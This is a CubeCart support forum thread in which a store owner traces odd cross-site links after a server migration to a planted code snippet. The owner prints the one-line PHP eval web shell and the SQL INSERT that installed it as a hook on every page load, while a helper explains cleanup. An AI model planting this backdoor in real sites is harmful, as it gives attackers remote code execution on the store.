Jump to content

Cross site contamination???


Recommended Posts

This is weird!

Two weeks ago I started migrating all my customers sites to a new web server. Starting with the Cubecart sites as they take a little longer to migrate.

Cubecart site A was downloaded from the old server along with an export from the database then uploaded to the new server and tested all OK

A day or two later Cubecart site B followed same process, tested all OK

Site B took orders OK up until 2 days ago. Today I had a call from the client to say a customer had tried to buy online but when clicking the links in the left column, pages from Site A loaded? I checked and found the same issue. In admin the correct products were listed all settings were normal. The caches were cleared and that reverted Site B to working order.

I haven't touched either site since the migration so can anyone explain how that can happen?

Both sites run CC version 5.2.16

 

Sorry posted in wrong forum should have been in General Technical Support Mods can you help?

 

 

Edited by Frank Auffret
wrong forum
Link to comment
Share on other sites

"clicking the links in the left column"

We know that (for whatever reason) CubeCart will create a "Shop by Category" category listing (the nav menu) at the oddest of times, and not when one would think it should, and will even create this list when an admin logs in to the Administration -- maybe even when simply presented with the admin login page. That said, this list is then cached.

Now, if the store acquires a new domain name and/or path, even 127.0.0.1 vs 'localhost' will do it, evetry link will acquire the reference to the new address except the nav menu. The nav menu has included in the links that have been cached the fully qualified web address. So, clearing the cache clears this situation.

I cannot guess how the nav menu links - eventually cached - acquired the web address of a different store. If you had transferred the cache (not necessary, btw), I would assume the nav menu would have the web address of the same store.

There may be factor involving the PHP session data, but I haven't proven that to myself.

What I always do, however, is give each store a unique PHP session name. This is set in the file ini.inc.php, near line 54:

ini_set('session.name', 'NAME_OF_STORE');

Link to comment
Share on other sites

Thanks for the reply, very odd thing this but I will take your advice regarding the session name and see what happens

Before I downloaded the site files from the old server I cleared the caches on both sites so any files in there would have been created after the migration was completed. I think the migrations of these two sites were on consecutive days.

but still doesn't make a lot of sense as the site worked as it should for over a week - orders were received - then for some reason the URL of the other store got cached.

Thanks again much appreciated.

 

Link to comment
Share on other sites

If you can get hold of the web server access logs, there may be some log entries there that may point to a clue as to why this is happening.

For example, if the access logs for Store-B show a Referrer: Store-A  (or v.v.) when there shouldn't be such a thing, we can start looking there.

Link to comment
Share on other sites

Way too suspicious.

Using an external utility such as phpMyAdmin, look in the table CubeCart_code_snippet. The column 'php_code' is of type BLOB. Therefore, the phpMyAdmin display probably won't show the contents directly. There should be a way to get the BLOB contents to be displayed in a pop-up window or something.

Find the record that has that content and you may learn what it is for.

But, on its own, that is an invitation for disaster.

I urgently suggest you edit the post above to remove the name of the snippet file. You don't want anyone to actually use it.

Link to comment
Share on other sites

Thanks again for your suggestions

I managed to read the BLOB it was same as file content
<?php eval($_REQUEST["8GsxU"]);?>

I searched all tables but didn't find any reference to 8GsxU
so I deleted the record - it wasn't there in the sql file migrated from the old server the folders are all set to rxwr-xr-x because I am using suExec so don't know how that file arrived in that folder.
I have deleted all site files except images and /includes/global.inc.php and re-upped from a clean version 5.2.16

Just have to see if it happens again

 

Link to comment
Share on other sites

I wanted you to let me know what the unique_id, description, and hook_trigger it was using.

Again, in the post above where you give the name of the snippet file, delete the name of the snippet file.

CubeCart will write a copy of the PHP code found in the database record into a file located at /includes/extra/ so that it is easier to include() that code at the hook location specified in the database record.

You will not find any other reference to the snippet's filename, nor the file's contents, anywhere else in the database or codebase.

Link to comment
Share on other sites

Hi bsmither

Sorry I've been away for a few days
So far no more link problems - since I deleted the snippet file BTW I exported it from the DB before I deleted it here's the sql
INSERT INTO `CubeCart_code_snippet` (`snippet_id`, `enabled`, `unique_id`, `description`, `hook_trigger`, `php_code`, `version`, `author`, `priority`) VALUES
(1, 1, 'snippet8GsxU', 'Snippet', 'controller.index', 0x3c3f706870206576616c28245f524551554553545b223847737855225d293b3f3e, '', '', 3);
 

Thanks for your help with this issue

Edited by Frank Auffret
to say thanks
Link to comment
Share on other sites

Thank you for the snippet record.

We are keeping it our minds as to how the query was executed that inserted this record in the first place. There is no identifying information.

The likelyhood of finding where it came from is probably none to nil, as one would need to look at the database server query logs to find it. The query logs are generally not enabled.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...